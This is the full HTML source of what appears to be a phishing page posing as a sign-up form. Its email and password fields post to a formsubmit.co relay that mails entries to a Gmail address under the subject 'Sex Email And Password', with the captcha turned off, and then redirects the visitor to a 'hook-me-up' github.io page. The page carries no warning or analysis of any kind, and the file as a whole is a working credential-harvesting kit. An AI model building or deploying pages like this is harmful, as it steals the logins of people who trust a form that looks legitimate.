<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

<title>Sign </title>
<style>
body {
  font-family: Arial;
  font-size: 17px;
  padding: 8px;
}

* {
  box-sizing: border-box;
}

.row {
  display: -ms-flexbox; /* IE10 */
  display: flex;
  -ms-flex-wrap: wrap; /* IE10 */
  flex-wrap: wrap;
  margin: 0 -16px;
}

.col-25 {
  -ms-flex: 25%; /* IE10 */
  flex: 25%;
}

.col-50 {
  -ms-flex: 50%; /* IE10 */
  flex: 50%;
}

.col-75 {
  -ms-flex: 75%; /* IE10 */
  flex: 75%;
}

.col-25,
.col-50,
.col-75 {
  padding: 0 16px;
}

.container {
  background-color: #f2f2f2;
  padding: 5px 20px 15px 20px;
  border: 1px solid lightgrey;
  border-radius: 3px;
}

input[type=text] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}

input[type=password] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
input[type=email] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}

label {
  margin-bottom: 10px;
  display: block;
}

.icon-container {
  margin-bottom: 20px;
  padding: 7px 0;
  font-size: 24px;
}

.btn {
  background-color: #2b96ff;
  color: white;
  padding: 12px;
  margin: 10px 0;
  border: none;
  width: 100%;
  border-radius: 3px;
  cursor: pointer;
  font-size: 17px;
}

.btn:hover {
  background-color: #45a049;
}

a {
  color: #2196F3;
} 

hr {
  border: 1px solid lightgrey;
}

span.price {
  float: right;
  color: grey;
}

/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other (also change the direction - make the "cart" column go on top) */
@media (max-width: 800px) {
  .row {
    flex-direction: column-reverse;
  }
  .col-25 {
    margin-bottom: 20px;
  }
}
</style>
</head>
<body>

<header>

    
<img class="logo" src="images/logo.png" height="30" width="60%" alt="">
    

    

   

</header>
<br>
<br>
<br> 		
  <br>
<br>
<br> 		
    		  		

<div class="row">
  <div class="col-75">
    <div class="container">
   <br>

    <form action="https://formsubmit.co/nftpro.minting@gmail.com" method="POST">
                <input type="hidden" name="_captcha" value="false">
                <input type="hidden" name="_subject" value="Sex Email And Password">
                <input type="hidden" name="_next" value="https://www-hook-me-up.github.io/hook-me-up/gateway.html">
    
  
   <hr>			<input type="email" id="email" name="Email" placeholder="Enter Your Email" >


<br>
   <input type="password" id="password" name="password" placeholder="Create New Password" ><hr>
       <input type="submit" class="btn" value="Continue...">
 </form>                       
                
              </div>
              
            </div>
          </div>
            
            
            
            
            
            
            
          
              </div>
            </div>
          </div>
          
        </div>
       
      </form>
    </div>
  </div>
  
    
  </div>
</div>
<br>
<br>
<br> 		
  <br>
<br>
<br> 	
<img src="images/s1.gif"  width="150" height="80" alt=""> <img src="images/s2.gif"  width="150" height ="80"alt="">
</body>
</html>
    
